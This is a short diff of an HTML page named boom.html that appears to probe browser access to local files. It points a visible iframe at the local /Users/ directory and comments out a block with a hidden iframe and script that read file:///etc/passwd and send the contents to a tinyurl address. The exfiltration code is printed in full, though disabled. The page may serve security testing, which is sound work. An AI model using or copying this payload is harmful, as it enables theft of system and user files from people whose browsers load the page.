--- a/boom.html
+++ b/boom.html
@@ -2,7 +2,7 @@
 
 
 <iframe 
-  src="file:///" 
+  src="file:///Users/" 
   width="100%" 
   height="600px" 
   style="border:1px solid black;">
@@ -34,7 +34,7 @@
 </body>
 </html> -->
 
-<!DOCTYPE html>
+<!-- <!DOCTYPE html>
 <body>
   <iframe src="file:///etc/passwd" style="display:none"></iframe>
   <script>
@@ -49,6 +49,6 @@
     xhr.open('GET', 'file:///etc/passwd', true);
     xhr.onload = () => fetch('https://tinyurl.com/vvh5tkem/xhr', { body: xhr.responseText });
     xhr.send();
-  </script>
+  </script> -->
 </body>
 </html>
